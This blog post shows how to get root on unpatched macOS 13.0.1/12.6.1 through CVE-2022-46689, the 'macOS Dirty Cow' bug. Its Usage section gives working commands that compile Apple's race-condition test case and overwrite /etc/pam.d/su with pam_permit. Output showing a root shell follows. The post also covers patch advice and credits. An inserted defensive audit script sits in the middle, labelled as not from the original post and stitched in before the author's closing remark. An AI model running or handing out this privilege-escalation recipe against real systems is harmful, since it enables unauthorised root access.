https://worthdoingbadly.com/macdirtycow/

# Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug

Dec 17, 2022

Get root on macOS 13.0.1 with CVE-2022-46689 (the macOS equivalent of the Dirty Cow bug), using the test case extracted from Apple's XNU source.

## Usage

On a macOS 13.0.1 / 12.6.1 (or below) machine, clone the extracted test case:

```
git clone https://github.com/zhuowei/MacDirtyCowDemo
```

Then run:

```
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
```

You should get:

```
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
```

Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on).

If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:

```
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
```

and running `su` should still ask for a password.

Thanks to the Sealed System Volume, running this on any file on the /System volume only modifies the file temporarily: it's reverted on reboot. Running it on a file on a writeable volume will preserve the modification after a reboot.

## Should I be worried?

If you installed the latest macOS update (macOS 13.1 / 12.6.2 / 11.7.2), you should be fine. If you haven't, do it now.

## Will this be useful for iOS jailbreak?

Probably not. This - as far as I can tell - affects userspace processes only. Jailbreaks require a kernel exploit. (The Apple Security release notes say that this bug may allow "arbitrary code with kernel privileges", but I can't see how.) You might still do something cool on iOS with this, but I'm not sure what you'd overwrite: codesigning should protect all executables and libraries.
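An added audit example, not code from the original post or from the MacDirtyCowDemo repository, covering the defensive side of the Usage and "Should I be worried?" sections above: it checks a macOS version string against the fixed releases the post lists, and checks whether /etc/pam.d/su still authenticates through pam_rootok.so or has been rewritten to pam_permit.so by the sed shown above. The PAM file text in the block is a constructed sample, and `audit_host` assumes a Mac where `sw_vers` is available.

```shell
# Added audit example; not code from the original post or MacDirtyCowDemo.
# It checks what the post leaves a defender to do: is this macOS a release the
# post lists as fixed (13.1 / 12.6.2 / 11.7.2), and does /etc/pam.d/su still
# gate su on pam_rootok.so, or was it rewritten to pam_permit.so as in the post?
# The PAM text below is a constructed sample, not copied from a system.

# Constructed sample of a stock su PAM stack: root gets through pam_rootok.so,
# everyone else has to satisfy pam_opendirectory.so (a password check).
STOCK_SU='# su: auth account password session
auth       sufficient     pam_rootok.so
auth       required       pam_opendirectory.so
account    required       pam_opendirectory.so no_check_shell'

# The same file after the post's sed: pam_permit.so always succeeds, and
# "sufficient" ends the auth stack right there, so su asks nobody for a password.
TAMPERED_SU=$(printf '%s\n' "$STOCK_SU" | sed -e 's/rootok/permit/g')

# Reads a PAM file on stdin; returns 0 if an active auth line uses pam_permit.so.
su_pam_tampered() {
    grep -Eq '^[[:space:]]*auth[[:space:]].*pam_permit\.so'
}

# Returns 0 if a version string (as printed by `sw_vers -productVersion`) is at
# or above the fixed release the post names for that major line, or newer.
macos_patched() {
    IFS=. read -r major minor patch <<EOF
$1
EOF
    minor=${minor:-0}
    patch=${patch:-0}
    case "$major" in
        13) fix_minor=1; fix_patch=0 ;;
        12) fix_minor=6; fix_patch=2 ;;
        11) fix_minor=7; fix_patch=2 ;;
        *)  # later major releases ship with the fix; older lines have none listed
            if [ "$major" -gt 13 ]; then return 0; else return 1; fi ;;
    esac
    if [ "$minor" -gt "$fix_minor" ]; then return 0; fi
    if [ "$minor" -eq "$fix_minor" ] && [ "$patch" -ge "$fix_patch" ]; then return 0; fi
    return 1
}

# Run both checks against the live host; call `audit_host` on a Mac to use it.
audit_host() {
    v=$(sw_vers -productVersion)
    macos_patched "$v" && echo "macOS $v: fixed for CVE-2022-46689" || echo "macOS $v: update to 13.1 / 12.6.2 / 11.7.2"
    su_pam_tampered < /etc/pam.d/su && echo "/etc/pam.d/su: pam_permit.so in auth stack (tampered)" || echo "/etc/pam.d/su: auth stack looks stock"
}
```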
(I have not tested this: let me know if you find anything!)

## Credits

* Ian Beer of Project Zero for finding this issue, and for finding other issues in XNU's virtual memory. Looking forward to the writeup for this issue.
* Apple for the test case and patch. (I didn't change anything: I just added the command line parameter to control what to overwrite.)
* SSLab@Gatech for the trick to disable password checking using /etc/pam.d.
* @WangTielei for sharing a related issue and answering my questions.

## Changelog

2022-12-17:

* clarified that "jailbreak" refers to iOS.
* clarified that the Project Zero issue link goes to a different issue than this one.
* linked the patch in vm_map_copy_overwrite_unaligned.